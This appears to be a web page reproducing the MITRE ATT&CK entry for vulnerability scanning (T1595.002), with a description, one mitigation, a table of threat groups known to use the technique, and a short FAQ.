Description
Adversaries may scan victims for vulnerabilities that can be used during targeting. Vulnerability scans typically check if the configuration of a target host/application (ex: software and version) potentially aligns with the target of a specific exploit the adversary may seek to use.
These scans may also include more broad attempts to Gather Victim Host Information that can be used to identify more commonly known, exploitable vulnerabilities. Vulnerability scans typically harvest running software and version numbers via server banners, listening ports, or other network artifacts.(Citation: OWASP Vuln Scanning) Information from these scans may reveal opportunities for other forms of reconnaissance (ex: Search Open Websites/Domains or Search Open Technical Databases), establishing operational resources (ex: Develop Capabilities or Obtain Capabilities), and/or initial access (ex: Exploit Public-Facing Application).
Subdomain Enumeration Tools
Read our in-depth pentesting guide related to this technique
Platforms
Mitigations (1)
Pre-compromiseM1056
This technique cannot be easily mitigated with preventive controls since it is based on behaviors performed outside of the scope of enterprise defenses and controls. Efforts should focus on minimizing the amount and sensitivity of data available to external parties.
Threat Groups (14)
| ID | Group | Context |
|---|---|---|
| G0034 | Sandworm Team | [Sandworm Team](https://attack.mitre.org/groups/G0034) has scanned network infrastructure for vulnerabilities as part of its operational planning.(Cit... |
| G0123 | Volatile Cedar | [Volatile Cedar](https://attack.mitre.org/groups/G0123) has performed vulnerability scans of the target server.(Citation: CheckPoint Volatile Cedar Ma... |
| G0065 | Leviathan | [Leviathan](https://attack.mitre.org/groups/G0065) has conducted reconnaissance against target networks of interest looking for vulnerable, end-of-lif... |
| G1003 | Ember Bear | [Ember Bear](https://attack.mitre.org/groups/G1003) has used publicly available tools such as MASSCAN and Acunetix for vulnerability scanning of publi... |
| G0096 | APT41 | [APT41](https://attack.mitre.org/groups/G0096) used the Acunetix SQL injection vulnerability scanner in target reconnaissance operations, as well as t... |
| G0139 | TeamTNT | [TeamTNT](https://attack.mitre.org/groups/G0139) has scanned for vulnerabilities in IoT devices and other related resources such as the Docker API.(Ci... |
| G0007 | APT28 | [APT28](https://attack.mitre.org/groups/G0007) has performed large-scale scans in an attempt to find vulnerable servers.(Citation: TrendMicro Pawn Sto... |
| G0059 | Magic Hound | [Magic Hound](https://attack.mitre.org/groups/G0059) has conducted widespread scanning to identify public-facing systems vulnerable to CVE-2021-44228 ... |
| G1055 | VOID MANTICORE | [VOID MANTICORE](https://attack.mitre.org/groups/G1055) has scanned victim environments for susceptibility to vulnerability exploitation.(Citation: DO... |
| G0016 | APT29 | [APT29](https://attack.mitre.org/groups/G0016) has conducted widespread scanning of target environments to identify vulnerabilities for exploit.(Citat... |
| G1035 | Winter Vivern | [Winter Vivern](https://attack.mitre.org/groups/G1035) has used remotely-hosted instances of the Acunetix vulnerability scanner.(Citation: SentinelOne... |
| G0143 | Aquatic Panda | [Aquatic Panda](https://attack.mitre.org/groups/G0143) has used publicly accessible DNS logging services to identify servers vulnerable to Log4j (CVE ... |
| G0035 | Dragonfly | [Dragonfly](https://attack.mitre.org/groups/G0035) has scanned targeted systems for vulnerable Citrix and Microsoft Exchange services.(Citation: CISA ... |
| G1006 | Earth Lusca | [Earth Lusca](https://attack.mitre.org/groups/G1006) has scanned for vulnerabilities in the public-facing servers of their targets.(Citation: TrendMic... |
References
Frequently Asked Questions
What is T1595.002 (Vulnerability Scanning)?
T1595.002 is a MITRE ATT&CK technique named 'Vulnerability Scanning'. It belongs to the Reconnaissance tactic(s). Adversaries may scan victims for vulnerabilities that can be used during targeting. Vulnerability scans typically check if the configuration of a target host/application (ex: software and version) pot...
How can T1595.002 be detected?
Detection of T1595.002 (Vulnerability Scanning) typically involves monitoring system logs, network traffic, and endpoint telemetry. Use SIEM rules, EDR solutions, and behavioral analytics to identify suspicious activity associated with this technique.
What mitigations exist for T1595.002?
There are 1 documented mitigations for T1595.002. Key mitigations include: Pre-compromise.
Which threat groups use T1595.002?
Known threat groups using T1595.002 include: Sandworm Team, Volatile Cedar, Leviathan, Ember Bear, APT41, TeamTNT, APT28, Magic Hound.